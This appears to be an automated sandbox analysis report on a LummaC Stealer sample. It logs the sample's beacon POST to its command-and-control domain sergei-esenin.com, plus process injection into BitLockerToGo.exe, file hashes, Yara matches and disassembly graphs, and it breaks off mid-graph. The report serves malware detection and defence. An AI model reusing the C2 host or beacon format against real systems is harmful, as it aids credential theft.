                                                                                                                                                          2024-10-13 19:34:56 UTC891INData Raw: 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d
                                                                                                                                                          Data Ascii: > <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id=
                                                                                                                                                          2024-10-13 19:34:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          3192.168.2.749712104.21.53.84431568C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-10-13 19:34:56 UTC354OUTPOST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          Cookie: __cf_mw_byp=_jIYC2pQ1pswVVaeyx4n19P1ZvDbEX.5r1GxGZkKCpE-1728848096-0.0.1.1-/api
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 47
                                                                                                                                                          Host: sergei-esenin.com
                                                                                                                                                          2024-10-13 19:34:56 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 58 57 56 6e 56 42 2d 2d 6c 61 6e 64 31 26 6a 3d
                                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=XWVnVB--land1&j=
                                                                                                                                                          2024-10-13 19:34:57 UTC831INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 13 Oct 2024 19:34:57 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: PHPSESSID=qe8amrtfifoqtret40pep0m4u3; expires=Thu, 06 Feb 2025 13:21:36 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZhyevlOcFNqjq7qOzGa93JMBr0OCjNz%2Fg%2FoPF%2FKTPqwTvGgX6ElZhuQqQ7aaD0URr57weuGTsWoc46jHstRDRcSzADhY%2B09jQBE%2B5OTTTUyb13GB0N83gpNhMDhWQmBwZeFJ8A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8d21c51eae29433f-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          2024-10-13 19:34:57 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                          2024-10-13 19:34:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Statistics

                                                                                                                                                          CPU Usage

                                                                                                                                                          Click to jump to process

                                                                                                                                                          Memory Usage

                                                                                                                                                          Click to jump to process

                                                                                                                                                          Behavior

                                                                                                                                                          Click to jump to process

                                                                                                                                                          System Behavior

                                                                                                                                                          General

                                                                                                                                                          Target ID:0
                                                                                                                                                          Start time:15:34:39
                                                                                                                                                          Start date:13/10/2024
                                                                                                                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe"
                                                                                                                                                          Imagebase:0x1d0000
                                                                                                                                                          File size:41'135'106 bytes
                                                                                                                                                          MD5 hash:DE577C633508C2BC5E7BE2AD04BF34F3
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          General

                                                                                                                                                          Target ID:2
                                                                                                                                                          Start time:15:34:48
                                                                                                                                                          Start date:13/10/2024
                                                                                                                                                          Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                          Imagebase:0xd90000
                                                                                                                                                          File size:231'736 bytes
                                                                                                                                                          MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:moderate
                                                                                                                                                          Has exited:true

                                                                                                                                                          Disassembly

                                                                                                                                                          Reset < >

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:2.6%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                            Signature Coverage:47.3%
                                                                                                                                                            Total number of Nodes:110
                                                                                                                                                            Total number of Limit Nodes:20
                                                                                                                                                            execution_graph 15892 40a9a0 15893 40a9a9 15892->15893 15894 40a9b7 ExitProcess 15893->15894 15895 40a9b9 GetCurrentProcess 15893->15895 15897 40a9c4 15895->15897 15898 40a9ca GetWindowInfo 15897->15898 15902 40a9c8 15897->15902 15907 40b810 15898->15907 15901 40a9e5 15901->15902 15903 40a9eb 15901->15903 15924 43c6c0 15902->15924 15918 40dcf0 15903->15918 15909 40b863 15907->15909 15914 40bd84 15909->15914 15916 40bac3 15909->15916 15917 40bd08 15909->15917 15927 40c000 15909->15927 15910 40bd48 CoInitializeEx 15911 40bd5a CoInitializeSecurity 15910->15911 15910->15914 15912 40bd7a 15911->15912 15911->15914 15931 4365e0 15912->15931 15914->15901 15915 40c000 RtlReAllocateHeap 15915->15917 15916->15914 15916->15915 15917->15910 15917->15914 15917->15917 15919 40dd2f 15918->15919 15919->15919 15920 40cc80 RtlReAllocateHeap 15919->15920 15923 40e126 15920->15923 15921 40e1b0 15922 40e137 GetSystemDirectoryW 15922->15923 15923->15921 15923->15922 15942 43db10 15924->15942 15926 43c6c5 FreeLibrary 15926->15894 15928 40c03c 15927->15928 15928->15928 15934 40cc80 15928->15934 15930 40c249 15930->15909 15932 43665f 15931->15932 15933 4366d6 CoCreateInstance 15932->15933 15933->15932 15933->15933 15936 40cee8 15934->15936 15936->15936 15937 40cff8 15936->15937 15938 43c6e0 15936->15938 15937->15930 15941 43c700 15938->15941 15939 43c7b0 RtlReAllocateHeap 15940 43c722 15939->15940 15940->15936 15941->15939 15941->15940 15943 43db19 15942->15943 15943->15926 15944 43c982 15946 43c8d4 15944->15946 15945 43c9fe 15946->15945 15949 43c800 LdrInitializeThunk 15946->15949 15948 43ca28 15949->15948 15950 43a762 RtlAllocateHeap 15951 43a7a2 15952 43a812 RtlFreeHeap 15951->15952 15953 43a7b0 15951->15953 15954 43a81e 15951->15954 15952->15954 15953->15952 15955 43d0e1 15956 43d0e0 15955->15956 15956->15955 15958 43d0ee 15956->15958 15962 43c800 LdrInitializeThunk 15956->15962 15961 43c800 LdrInitializeThunk 15958->15961 15960 43d22e 15961->15960 15962->15958 15963 43eaa0 15965 43eac0 15963->15965 15964 43ec1e 15965->15964 15967 43c800 LdrInitializeThunk 15965->15967 15967->15964 15968 43566a GetCurrentProcess 15969 435688 15968->15969 15970 43569d GetUserDefaultUILanguage 15969->15970 15971 4356c5 15970->15971 15972 436728 15973 436797 SysAllocString 15972->15973 15974 43676a 15972->15974 15975 4367bd 15973->15975 15974->15973 15976 43680f 15977 4367f0 CoSetProxyBlanket 15976->15977 15978 4367c9 15976->15978 15979 4367cf CoSetProxyBlanket 15976->15979 15977->15978 15978->15976 15978->15979 15979->15977 15980 43cff1 15981 43cffb 15980->15981 15982 43ce32 15980->15982 15982->15980 15982->15981 15985 43c800 LdrInitializeThunk 15982->15985 15984 43cfe6 15985->15984 15986 43ca31 15987 43ca62 15986->15987 15990 43c800 LdrInitializeThunk 15987->15990 15989 43caef 15990->15989 15991 43bc78 15994 43bcbc 15991->15994 15992 43c7b0 RtlReAllocateHeap 15993 43c722 15992->15993 15994->15992 15994->15993 15994->15994 15995 40c69d 15996 40c6b0 15995->15996 15996->15996 15997 40c6d5 15996->15997 15998 43c6e0 RtlReAllocateHeap 15996->15998 16000 40cc0a 15996->16000 15998->15996 15999 43c6e0 RtlReAllocateHeap 15999->16000 16000->15999 16000->16000 16001 40cff8 16000->16001 16002 43681d 16003 436841 16002->16003 16004 436877 SysAllocString 16002->16004 16003->16004 16005 43692e SysAllocString 16004->16005 16006 4368ed 16004->16006 16013 43694f 16005->16013 16006->16005 16007 436c24 16011 436c2c SysFreeString SysFreeString 16007->16011 16008 436994 VariantInit 16015 4369f0 16008->16015 16009 436c14 VariantClear 16009->16007 16010 436a4e SysStringLen 16018 436a6e 16010->16018 16014 436c48 SysFreeString 16011->16014 16012 436c9a 16013->16007 16013->16008 16013->16009 16013->16010 16013->16011 16013->16018 16016 436c5a 16014->16016 16015->16009 16015->16010 16015->16018 16017 436c73 GetVolumeInformationW 16016->16017 16017->16012 16018->16009 16018->16012

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 0043681D Relevance: 19.7, APIs: 9, Strings: 2, Instructions: 405memoryCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 0 43681d-43683f 1 436841 0->1 2 436877-4368eb SysAllocString 0->2 3 436850-436875 1->3 4 43692e-436954 SysAllocString 2->4 5 4368ed-4368ef 2->5 3->2 3->3 8 436bb0-436be6 4->8 9 436c24-436c28 4->9 10 436994-4369ee VariantInit 4->10 11 436c14-436c20 VariantClear 4->11 12 43695b-436971 4->12 13 436c09-436c11 call 40a310 4->13 14 436a4e-436a6c SysStringLen 4->14 15 436bfd-436c00 4->15 16 436bed-436bf6 4->16 17 436c2c-436c93 SysFreeString * 3 call 43e080 GetVolumeInformationW 4->17 6 4368f0-43692c 5->6 6->4 6->6 8->11 8->13 8->15 8->16 23 436e72 8->23 24 436e30-436e40 8->24 25 436e47-436e54 8->25 26 436eca-436ed1 8->26 27 436c9a-436ca9 8->27 9->17 18 4369f0-436a23 10->18 19 436a25-436a32 10->19 11->9 28 436975-43698d 12->28 13->11 21 436aa9 14->21 22 436a6e-436a72 14->22 15->13 16->8 16->11 16->13 16->15 16->16 16->23 16->24 16->25 16->26 16->27 17->23 17->24 17->25 17->26 17->27 18->18 18->19 34 436a36-436a47 19->34 32 436aab-436ac2 call 40a300 21->32 30 436a82-436a85 22->30 24->23 24->25 25->23 33 436e5b-436e67 25->33 27->23 27->24 27->25 27->26 28->8 28->9 28->10 28->11 28->13 28->14 28->15 28->16 30->32 35 436a87-436aa3 30->35 41 436ac8-436acf 32->41 42 436b8f-436b9c 32->42 33->23 34->8 34->11 34->13 34->14 34->15 34->16 37 436aa5-436aa7 35->37 38 436a74-436a80 35->38 37->38 38->30 38->32 41->42 45 436ad5-436ae1 41->45 42->8 42->11 42->13 42->15 42->16 42->23 42->24 42->25 42->26 42->27 46 436ae4-436aeb 45->46 46->42 47 436af1-436af5 46->47 48 436b00-436b10 47->48 49 436af7-436afe 47->49 51 436b12-436b18 48->51 52 436b3d-436b4b 48->52 50 436b7a-436b7f 49->50 50->42 55 436b81-436b89 50->55 51->52 53 436b1a-436b3b 51->53 52->50 54 436b4d-436b75 52->54 53->50 54->50 55->42 55->46
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: String$Alloc$InitVariant
                                                                                                                                                            • String ID: YmC$rnC
                                                                                                                                                            • API String ID: 3520221836-3969294163
                                                                                                                                                            • Opcode ID: cc0782fa5bc4575f6715a7bde3449489c57378219f9bf7960f9699414c49ac44
                                                                                                                                                            • Instruction ID: f7ea2be89283f713bd0516aaaec10ec30aeb0a5355e630bcd4f8e36aece2a8e2
                                                                                                                                                            • Opcode Fuzzy Hash: cc0782fa5bc4575f6715a7bde3449489c57378219f9bf7960f9699414c49ac44
                                                                                                                                                            • Instruction Fuzzy Hash: 85E17A75604B419FD328CF29C891B26B7F2FF49310F15892DD5968BBA1D739E442CB44
                                                                                                                                                            Function 0040B810 Relevance: 14.6, APIs: 2, Strings: 6, Instructions: 601COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 56 40b810-40b861 57 40b8b0-40b8cd call 43b9f0 56->57 58 40b863 56->58 63 40b8d3-40b9fa call 43e080 * 12 57->63 64 40bfea-40bff6 57->64 59 40b870-40b8ae 58->59 59->57 59->59 89 40ba00-40ba18 call 437270 63->89 92 40ba20-40ba27 89->92 92->92 93 40ba29-40ba3b 92->93 94 40baa1-40bab1 call 40c000 93->94 95 40ba3d-40ba46 93->95 102 40bab7-40babd 94->102 103 40bd08-40bd10 94->103 97 40ba50-40ba53 95->97 99 40ba90-40ba93 97->99 100 40ba55-40ba74 call 40db90 97->100 101 40ba96-40ba9a 99->101 109 40ba76-40ba7c 100->109 110 40ba7e-40ba84 100->110 101->94 102->89 106 40bac3-40bbb8 102->106 107 40bd12-40bd17 103->107 108 40bd3f 103->108 111 40bbba 106->111 112 40bc0b-40bc24 call 40c5e0 106->112 113 40bd20-40bd32 107->113 114 40bd48-40bd54 CoInitializeEx 108->114 109->97 109->110 110->101 117 40bbc0-40bc09 111->117 115 40bfe8 112->115 123 40bc2a-40bc7f 112->123 113->113 119 40bd34-40bd3d 113->119 114->115 116 40bd5a-40bd74 CoInitializeSecurity 114->116 115->64 116->115 120 40bd7a-40bd7f call 4365e0 116->120 117->112 117->117 119->114 126 40bd84-40bd89 120->126 124 40bc81 123->124 125 40bcc4-40bccf 123->125 127 40bc90-40bcc2 124->127 128 40bcd5-40bcd9 125->128 129 40bd8e 125->129 126->64 127->125 127->127 130 40bceb-40bcef 128->130 131 40bd90-40bd92 129->131 132 40bcf5-40bcfc 130->132 133 40bfdc-40bfe5 call 43a780 130->133 131->133 134 40bd98-40bdba 131->134 135 40bd02 132->135 136 40bcfe-40bd00 132->136 133->115 137 40bdf6-40bdff 134->137 138 40bdbc-40bdbf 134->138 141 40bce0-40bce5 135->141 142 40bd04-40bd06 135->142 136->135 143 40be01-40be0b 137->143 144 40be34-40be36 137->144 140 40bdc0-40bdf4 138->140 140->137 140->140 141->130 141->131 142->141 147 40be17-40be1b 143->147 144->133 146 40be3c-40be44 144->146 148 40be50-40be58 146->148 147->133 149 40be21-40be28 147->149 148->148 150 40be5a-40be5d 148->150 151 40be2a-40be2c 149->151 152 40be2e 149->152 155 40be63-40be65 150->155 156 40bf05-40bf14 150->156 151->152 153 40be10-40be15 152->153 154 40be30-40be32 152->154 153->144 153->147 154->153 157 40bed1-40bed3 155->157 158 40be67-40be70 155->158 159 40bf20-40bf27 156->159 160 40bed5-40beda 157->160 161 40be87-40be94 158->161 159->159 162 40bf29-40bf3f 159->162 160->156 163 40bedc-40bee9 160->163 164 40be96-40be9e 161->164 165 40beaa-40bebe 161->165 166 40bf41 162->166 167 40bf7d-40bf8d call 40c000 162->167 168 40beeb-40bef3 163->168 169 40befe 163->169 171 40bea0-40bea3 164->171 172 40bea5-40bea8 164->172 174 40bec0-40bec8 165->174 175 40be77-40be85 165->175 173 40bf43-40bf47 166->173 167->133 183 40bf8f-40bf9e 167->183 176 40bef5-40bef7 168->176 177 40bef9-40befc 168->177 169->156 171->172 172->165 179 40bf77-40bf7a 173->179 180 40bf49-40bf65 call 40db90 173->180 181 40be72-40be75 174->181 182 40beca-40becf 174->182 175->160 175->161 176->177 177->169 179->167 190 40bf67-40bf6d 180->190 191 40bf6f-40bf75 180->191 181->175 182->181 185 40bfa0-40bfa4 183->185 186 40bfc1-40bfca call 43a780 183->186 188 40bfb0-40bfbf 185->188 192 40bfcf-40bfd4 186->192 188->186 188->188 190->173 190->191 191->167 192->114 193 40bfda 192->193 193->115
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: C6T&$D7E607294FA75EE68FF62E1106C8CCA8$QQ!.$Z.^^$\"Y $sergei-esenin.com
                                                                                                                                                            • API String ID: 0-1534639489
                                                                                                                                                            • Opcode ID: b8de83478b42807edfbfb77dcae6b9da56dc18adc1b9ec55f59c9e233b6e0b32
                                                                                                                                                            • Instruction ID: 1f1654bdb7cbdd608bfaf90879f2b1bfbfdf568bc53ae3b2ddb7df9b58b85f24
                                                                                                                                                            • Opcode Fuzzy Hash: b8de83478b42807edfbfb77dcae6b9da56dc18adc1b9ec55f59c9e233b6e0b32
                                                                                                                                                            • Instruction Fuzzy Hash: 9912BFB45083409BD3109F15DC907AEBBE1EF96308F148A2EE8D56B392D7798905CF9E
                                                                                                                                                            Function 0040CC80 Relevance: 14.6, Strings: 11, Instructions: 842COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 194 40cc80-40cee6 195 40cf23-40cf4b 194->195 196 40cee8 194->196 199 40cf52-40cf5b 195->199 200 40d0f2-40d10e 195->200 201 40d1d3-40d1de 195->201 202 40d1e3-40d1f1 195->202 203 40d313-40d33f 195->203 204 40cf74-40cf9a 195->204 205 40d005-40d021 195->205 206 40d1c5-40d1cc 195->206 207 40cff8 195->207 208 40d1f8-40d25d 195->208 209 40cfef-40cff3 195->209 197 40cef0-40cf21 196->197 197->195 197->197 199->204 214 40d110-40d143 200->214 215 40d145-40d17d 200->215 232 40d452 201->232 202->203 202->208 219 40d422-40d431 202->219 220 40d444 202->220 221 40d3a5-40d3b8 202->221 222 40d448 202->222 223 40d390-40d395 202->223 224 40d410-40d415 202->224 225 40d374-40d37e 202->225 226 40d356-40d358 202->226 227 40d436-40d43d 202->227 228 40d478-40d47f 202->228 229 40d3db-40d403 202->229 230 40d41c 202->230 231 40d3bf-40d3d4 call 43c6e0 202->231 238 40d346-40d34f 203->238 212 40cfd0-40cfd9 204->212 213 40cf9c-40cf9f 204->213 217 40d023 205->217 218 40d065-40d09c 205->218 206->201 206->202 206->203 206->208 206->219 206->220 206->221 206->222 206->223 206->224 206->225 206->226 206->227 206->228 206->229 206->230 206->231 207->205 210 40d290-40d298 208->210 211 40d25f 208->211 216 40d459 209->216 236 40d2c2-40d2d2 210->236 237 40d29a-40d2a2 210->237 235 40d260-40d28e 211->235 271 40cfdf-40cfe8 212->271 240 40cfa0-40cfce 213->240 214->214 214->215 233 40d0e0-40d0ec 215->233 234 40d183 215->234 272 40d463-40d471 216->272 241 40d030-40d063 217->241 242 40d0d0-40d0dc 218->242 243 40d09e-40d09f 218->243 219->223 220->222 221->220 221->222 221->224 221->227 221->228 221->229 221->230 221->231 222->232 267 40d39f 223->267 224->220 224->222 224->227 224->228 224->230 225->223 266 40d362-40d36d 226->266 227->220 227->222 227->228 244 40d4b0 228->244 245 40d7a0-40d7bc 228->245 246 40d4c1-40d4c7 call 43a780 228->246 247 40d833-40d852 228->247 248 40d486 228->248 249 40d4b8-40d4be call 43a780 228->249 250 40d799-40d79b 228->250 251 40d49c-40d4a3 228->251 252 40d48c-40d49b 228->252 253 40d82c-40d82e 228->253 229->220 229->222 229->224 229->227 229->228 229->230 231->220 231->222 231->224 231->227 231->228 231->229 231->230 232->216 233->200 259 40d190-40d1be 234->259 235->210 235->235 264 40d2d4-40d2d6 236->264 265 40d2f6-40d311 236->265 263 40d2b0-40d2c0 237->263 238->219 238->220 238->221 238->222 238->223 238->224 238->225 238->226 238->227 238->228 238->229 238->230 238->231 240->212 240->240 241->218 241->241 242->200 273 40d0a0-40d0ce 243->273 244->249 256 40d80a-40d825 245->256 257 40d7be-40d7bf 245->257 246->250 261 40d894-40d8c2 247->261 262 40d854 247->262 248->252 249->246 255 40d94e-40d957 250->255 251->244 251->245 251->247 251->250 251->252 251->253 260 40d945 253->260 256->247 256->253 288 40db60-40db87 256->288 289 40d980-40d989 256->289 290 40d9c1 256->290 291 40d9e3-40d9ea 256->291 292 40d924-40d926 256->292 293 40d9c7-40d9cb 256->293 294 40d928-40d92f 256->294 295 40d968-40d96a 256->295 296 40d96c-40d975 256->296 297 40d98f 256->297 298 40d9f1-40da4b 256->298 299 40d991 256->299 300 40d9d2-40d9dd 256->300 301 40d936 256->301 302 40d958-40d961 256->302 303 40d99c-40d9ba 256->303 277 40d7c0-40d808 257->277 259->259 279 40d1c0 259->279 260->255 281 40d904-40d91d 261->281 282 40d8c4 261->282 280 40d860-40d892 262->280 263->236 263->263 283 40d2e0-40d2f2 264->283 265->203 266->219 266->220 266->221 266->222 266->223 266->224 266->225 266->227 266->228 266->229 266->230 266->231 267->221 271->200 271->201 271->202 271->203 271->205 271->206 271->207 271->208 271->209 272->200 272->201 272->202 272->203 272->206 272->208 272->219 272->220 272->221 272->222 272->223 272->224 272->225 272->226 272->227 272->228 272->229 272->230 272->231 273->242 273->273 277->256 277->277 279->233 280->261 280->280 281->288 281->289 281->290 281->291 281->292 281->293 281->294 281->295 281->296 281->297 281->298 281->299 281->300 281->301 281->302 281->303 285 40d8d0-40d902 282->285 283->283 286 40d2f4 283->286 285->281 285->285 286->265 288->289 288->290 288->295 288->296 288->297 288->299 288->302 288->303 289->297 290->293 291->288 291->289 291->290 291->295 291->296 291->297 291->298 291->299 291->302 291->303 305 40d93c 292->305 293->300 294->288 294->289 294->290 294->291 294->293 294->295 294->296 294->297 294->298 294->299 294->300 294->301 294->302 294->303 306 40d993-40d99a 295->306 296->289 297->299 307 40da82-40da89 298->307 308 40da4d-40da4f 298->308 299->306 300->291 301->305 302->295 302->297 303->289 303->290 303->295 303->296 303->297 303->302 305->260 306->305 315 40dab1-40dac0 307->315 316 40da8b-40da94 307->316 314 40da50-40da80 308->314 314->307 314->314 317 40dac2-40dac4 315->317 318 40dae5-40db0c 315->318 320 40daa0-40daaf 316->320 321 40dad0-40dae1 317->321 322 40db52-40db5d 318->322 323 40db0e-40db0f 318->323 320->315 320->320 321->321 324 40dae3 321->324 322->288 325 40db10-40db50 323->325 324->318 325->322 325->325
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: *M/O$+y-{$5Q}S$6abc$;I+K$C-C/$Y1Y3$[u#w$_=U?$p~$sergei-esenin.com
                                                                                                                                                            • API String ID: 0-1859607568
                                                                                                                                                            • Opcode ID: 411cfc0b810c803cc16bf6648014cd735b07a8082921f204179fb14c882bfd26
                                                                                                                                                            • Instruction ID: fc48a0543df603f45fec8ff12a8c085a20f594a9923345cd7e2eba27ad107f33
                                                                                                                                                            • Opcode Fuzzy Hash: 411cfc0b810c803cc16bf6648014cd735b07a8082921f204179fb14c882bfd26
                                                                                                                                                            • Instruction Fuzzy Hash: 406296B4508345DFD7249F54D890BAFBBB2FF86710F108A2DE5996B290CB349901CF5A
                                                                                                                                                            Function 0040C69D Relevance: 7.4, Strings: 5, Instructions: 1154COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: #:$:6$p~$sergei-esenin.com$sq
                                                                                                                                                            • API String ID: 0-1602847909
                                                                                                                                                            • Opcode ID: 2cbd70040ee492767e5e335275005e347472d131d9eee89c99bd12e0c7c94366
                                                                                                                                                            • Instruction ID: e326c0b78092f1179307cafdfc488eb50248af47790a0d19bcb8f83c70445e2f
                                                                                                                                                            • Opcode Fuzzy Hash: 2cbd70040ee492767e5e335275005e347472d131d9eee89c99bd12e0c7c94366
                                                                                                                                                            • Instruction Fuzzy Hash: FE92BAB4608701DFD714CF64D890B6EBBB1FF8A711F148A2CE5966B690CB34A811CF99
                                                                                                                                                            Function 0040C000 Relevance: 5.4, Strings: 4, Instructions: 422COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 513 40c000-40c03a 514 40c073-40c186 513->514 515 40c03c-40c03f 513->515 517 40c1c0-40c1f3 514->517 518 40c188 514->518 516 40c040-40c071 515->516 516->514 516->516 520 40c233-40c24e call 40cc80 517->520 521 40c1f5 517->521 519 40c190-40c1be 518->519 519->517 519->519 525 40c384-40c386 520->525 526 40c254-40c275 520->526 522 40c200-40c231 521->522 522->520 522->522 529 40c582-40c58c 525->529 527 40c277 526->527 528 40c2ae-40c2b4 526->528 530 40c280-40c2ac 527->530 531 40c2c0-40c2ca 528->531 530->528 530->530 532 40c2d1-40c2d9 531->532 533 40c2cc-40c2cf 531->533 534 40c572-40c576 call 43a780 532->534 535 40c2df-40c304 532->535 533->531 533->532 540 40c57b-40c57e 534->540 536 40c306 535->536 537 40c33e-40c349 535->537 539 40c310-40c33c 536->539 541 40c38b 537->541 542 40c34b-40c34f 537->542 539->537 539->539 540->529 544 40c38d-40c38f 541->544 543 40c367-40c36b 542->543 546 40c56a 543->546 547 40c371-40c378 543->547 545 40c395-40c3d6 544->545 544->546 548 40c3d8 545->548 549 40c40e-40c419 545->549 546->534 550 40c37a-40c37c 547->550 551 40c37e 547->551 552 40c3e0-40c40c 548->552 553 40c454 549->553 554 40c41b-40c423 549->554 550->551 555 40c360-40c365 551->555 556 40c380-40c382 551->556 552->549 552->552 558 40c456-40c458 553->558 557 40c437-40c43b 554->557 555->543 555->544 556->555 557->546 559 40c441-40c448 557->559 558->546 560 40c45e-40c483 558->560 561 40c44a-40c44c 559->561 562 40c44e 559->562 563 40c485 560->563 564 40c4be-40c4c5 560->564 561->562 567 40c430-40c435 562->567 568 40c450-40c452 562->568 569 